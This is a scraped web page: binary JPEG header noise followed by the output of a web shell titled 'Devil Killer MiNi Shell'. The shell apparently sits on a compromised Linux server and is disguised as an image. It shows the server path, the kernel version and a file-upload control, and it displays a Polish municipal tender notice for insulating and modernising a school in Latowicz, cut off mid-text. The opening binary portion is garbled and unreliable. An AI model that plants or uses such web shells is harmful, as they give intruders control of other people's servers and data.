JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221012/0038950601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Poprawa efektywności energetycznej budynku Zespołu Szkół w Latowiczu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Latowicz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711582730</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Latowicz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-334</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gmina-latowicz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">latowicz.samorzady.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa efektywności energetycznej budynku Zespołu Szkół w Latowiczu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d5c8350c-4a20-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00389506</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00024407/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Poprawa efektywności energetycznej budynku Zespołu Szkół w Latowiczu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt współfinansowany ze środków Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/Postępowania</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP).<br/>1.4/ Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020 roku w sprawie sposobu sporządzenia i przekazywania<br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych w postępowaniu o udzielenie<br/>zamówienia publicznego lub w konkursie (Dz.U z 2020r. poz.2452) oraz Rozporządzenia Ministra<br/>Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 roku w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów, jakich może żądać Zamawiający od Wykonawcy (Dz.U. z 2020<br/>r. poz. 2415).<br/>1.5/ W celu korzystania z systemu miniPortal konieczne jest dysponowanie przez użytkownika<br/>urządzeniem teleinformatycznym z dostępem do sieci Internet. Aplikacja działa tylko na platformie<br/>Windows i wymaga .NET Framework 4.5 Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru danych:<br/>- specyfikacja połączenia formularze udostępnione są za pomocą protokołu TLS 1.2, format danych<br/>oraz kodowanie miniPortal - Formularze dostępne są w formacie HTML z kodowaniem UTF-8,<br/>- oznaczenia czasu odbioru danych – miniPortal - wszelkie operacje opierają się o czas serwera i dane<br/>zapisywane są z dokładnością co do setnej części sekundy,<br/>- integracja z systemem ePUAP jest wykonana w wykorzystaniem standardowego mechanizmu<br/>ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">administratorem Pani/Pana danych osobowych jest Wójt<br/>Gminy Latowicz z siedzibą w Latowiczu, ul. Rynek 6, 05-334 Latowicz, tel: 25 752 10 65, mail:<br/>sekretariat@gmina-latowicz.pl na mocy art. 37 ust. 1 lit a RODO administrator powołał Inspektora<br/>Ochrony Danych (IOD), który w jego imieniu nadzoruje strefę przetwarzania danych osobowych. Z IOD<br/>można kontaktować się pod adresem inspektor@cbi24.pl, lub listownie: Gmina Latowicz, ul. Rynek 6,<br/>05-334 Latowicz<br/>2. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w<br/>trybie przetargu nieograniczonego;<br/>3. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy Pzp;<br/>4. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>5. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego, konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>6. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO; posiada Pani/Pan:<br/>na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych 1);<br/>na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO 2);</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">prawo do wniesienia skargi do Prezesa Urzędu Ochrony<br/>Danych Osobowych (ul. Stawki 2, 00-193 Warszawa), gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8. nie przysługuje Pani/Panu: w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>9. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z<br/>ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGOŚ.271.13A.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.1/ Przedmiotem zamówienia jest:<br/><br/>Inwestycja zlokalizowana jest w Zespole Szkół w Latowiczu przy ul. Rynek 24. Zarówno budynek jak i teren, na którym jest zlokalizowany, leżą w strefie ochrony konserwatorskiej. Budynek jest użytkowany całorocznie, w okresie wakacji szkolnych (lipiec, sierpień), <br/>w minimalnym stopniu. W ramach zamówienia zostanie wykonane:<br/>1) docieplenie stropodachu nad kuchnią i stołówką metodą wyłożenia od góry styropapy o współczynniku przewodności cieplnej wynoszącym co najwyżej 0,038W/mK, <br/>2) wymiana stolarki okiennej drewnianej na nową stolarkę w ramach PCV, <br/>3) docieplenie ścian metodą bezspoinową z użyciem styropianu o współczynniku przewodności cieplnej wynoszącym co najwyżej 0,038 W/mK, <br/>4) docieplenie stropu pod nieogrzewanym poddaszem metodą wyłożenia od góry wełny mineralnej o współczynniku przewodności cieplnej wynoszącym co najwyżej 0,040 W/mK, <br/>5) wymiana istniejących drzwi na szczelne o niższych współczynnikach U, zgodnie z WT2021 orz wymiana drzwi drewnianych na drzwi aluminiowe<br/>6) modernizacja źródła ciepła (2 zestawy , z których każdy składa się z 3 pomp ciepła tj. razem 6 pomp ciepła oraz zestaw 3 kotłów gazowych ), czyszczenie i równoważenie instalacji c.o.),<br/>7) docieplenie podłogi w świetlicy wełną mineralną lub styropianem o współczynniku przewodzenia ciepła nie wyższym niż 0,040 W/ mK lub z użyciem innego materiału dającego co najmniej taki sam opór cieplny co warstwa wełny mineralnej lub styropianu o wymienionych wyżej parametrach. Po wykonaniu ocieplenia wierzchnią warstwę wykonać z paneli podłogowych o klasie ścieralności co najmniejAC-4o podwyższonej odporności na ścieranie przeznaczonych dla obiektów użyteczności publicznej lub wykładziny homogenicznej winylowej.<br/>8) instalacja wentylacji mechanicznej nawiewno – wywiewnej zapewniająca co najmniej <br/>2 krotną wymianę powietrza na sali gimnastycznej, <br/>9) wymiana opraw oświetleniowych oraz punktów świetlnych na źródła LED, <br/>10) montaż dwóch instalacji fotowoltaicznych o łącznej mocy 79,86 kWp. Dwie instalacje po ok.40 kWp każda. <br/><br/>Wszystkie materiały przeznaczone do wykorzystania w ramach prowadzonej inwestycji będą materiałami w najwyższym stopniu nadającymi się do niniejszych robót. Będą to materiały fabrycznie nowe, pierwszej klasy i jakości, wolne od wad fabrycznych <br/>i o długiej żywotności.<br/>11) sporządzenie audytu energetycznego ex-post w celu potwierdzenia zakładanych w projekcie wskaźników produktu i rezultatu<br/>Stopień poprawy efektywności energetycznej – energia końcowa wynosi 74% energii końcowej według stanu aktualnego.<br/>12) sprawowanie nadzoru autorskiego w zakresie zgodności wykonania robót budowalnych z opracowaną dokumentacją projektową.<br/><br/>Szczegółowy opis przedsięwzięcia polegającego na poprawie efektywności energetycznej zawarto w załączonych audytach energetycznych oraz dokumentacji projektowej - Programie Funkcjonalno-Użytkowym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45320000-6 - Roboty izolacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">50700000-2 - Usługi w zakresie napraw i konserwacji instalacji budynkowych</p> <p class="mb-0">09300000-2 - Energia elektryczna, cieplna, słoneczna i jądrowa</p> <p class="mb-0">09310000-5 - Elektryczność</p> <p class="mb-0">09330000-1 - Energia słoneczna</p> <p class="mb-0">09331000-8 - Baterie słoneczne</p> <p class="mb-0">44112000-8 - Różne konstrukcje budowlane</p> <p class="mb-0">44112410-5 - Konstrukcje dachowe</p> <p class="mb-0">44621220-7 - Kotły grzewcze centralnego ogrzewania</p> <p class="mb-0">44621000-9 - Grzejniki i kotły grzewcze</p> <p class="mb-0">45421130-4 - Instalowanie drzwi i okien</p> <p class="mb-0">45421110-8 - Instalowanie ram drzwiowych i okiennych</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45261215-4 - Pokrywanie dachów panelami ogniw słonecznych</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71314100-3 - Usługi elektryczne</p> <p class="mb-0">71300000-1 - Usługi inżynieryjne</p> <p class="mb-0">71323100-9 - Usługi projektowania systemów zasilania energią elektryczną</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">72000000-5 - Usługi informatyczne: konsultacyjne, opracowywania oprogramowania, internetowe i wsparcia</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">09331200-0 - Słoneczne moduły fotoelektryczne</p> <p class="mb-0">45315300-1 - Instalacje zasilania elektrycznego</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">39370000-6 - Instalacje wodne</p> <p class="mb-0">51112000-0 - Usługi instalowania sprzętu sterowania i przesyłu energii elektrycznej</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45262900-0 - Roboty balkonowe</p> <p class="mb-0">45262310-7 - Zbrojenie</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45223100-7 - Montaż konstrukcji metalowych</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45432100-5 - Kładzenie i wykładanie podłóg</p> <p class="mb-0">45442200-9 - Nakładanie powłok antykorozyjnych</p> <p class="mb-0">45331210-1 - Instalowanie wentylacji</p> <p class="mb-0">45331200-8 - Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">42520000-7 - Urządzenia wentylacyjne</p> <p class="mb-0">31524120-2 - Oświetlenie sufitowe</p> <p class="mb-0">31524100-6 - Oprawy oświetleniowe sufitowe</p> <p class="mb-0">31524210-0 - Oświetlenie ścienne</p> <p class="mb-0">31520000-7 - Lampy i oprawy oświetleniowe</p> <p class="mb-0">31500000-1 - Urządzenia oświetleniowe i lampy elektryczne</p> <p class="mb-0">31531100-8 - Żarówki oświetleniowe</p> <p class="mb-0">31532000-4 - Części lamp i opraw oświetleniowych</p> <p class="mb-0">31527200-8 - Oświetlenie zewnętrzne</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">44171000-9 - Płyty (budowlane)</p> <p class="mb-0">44221000-5 - Okna, drzwi i podobne elementy</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45333000-0 - Roboty instalacyjne gazowe</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">45315100-9 - Instalacyjne roboty elektrotechniczne</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45314300-4 - Instalowanie infrastruktury okablowania</p> <p class="mb-0">45312310-3 - Ochrona odgromowa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień na podstawie art. 214 ust. 1 pkt 7 ustawy Pzp/zamówienia polegającego na powtórzeniu podobnych robót budowlanych, zamówienia na dodatkowe roboty budowlane, które stanowić będą nie więcej niż 20 % wartości zamówienia podstawowego.<br/>Zakres zamówienia na podobne roboty budowlane:<br/>Roboty rozbiórkowe, ciesielskie, dekarskie, murarskie, tynkarskie, izolacyjne, wykończeniowe, montażowe oraz związane z instalacjami elektrycznymi, hydraulicznymi, sanitarnymi, grzewczymi i teletechnicznymi oraz inne, określone w PFU załączonym do dokumentacji przetargowej. Zamówienie powinno polegać na powtórzeniu podobnych usług lub robót budowlanych, i powinno być zgodne z jego przedmiotem</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 5.4.) Nazwa i opis warunków udziału w postępowaniu.<br/>1) Zdolności do występowania w obrocie w gospodarczym.<br/>Zamawiający nie stawia szczególnych wymagań z zakresu tego warunku.<br/>2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie stawia szczególnych wymagań z zakresu tego warunku.<br/>3) Sytuacji ekonomicznej lub finansowej:<br/>Wykonawca spełni ten warunek udziału w postępowaniu, jeżeli wykaże, że<br/>- posiada środki finansowe, lub zdolność kredytową na kwotę nie mniejszą niż 300 000zł<br/>- polisę OC w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w łącznej<br/>wysokości co najmniej 300 000,00 zł<br/>4) Zdolności technicznej lub zawodowej:<br/>Wykonawca spełni ten warunek udziału w postępowaniu, jeżeli wykaże, że<br/>4.1 wykonał roboty budowlane nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości,<br/>daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te 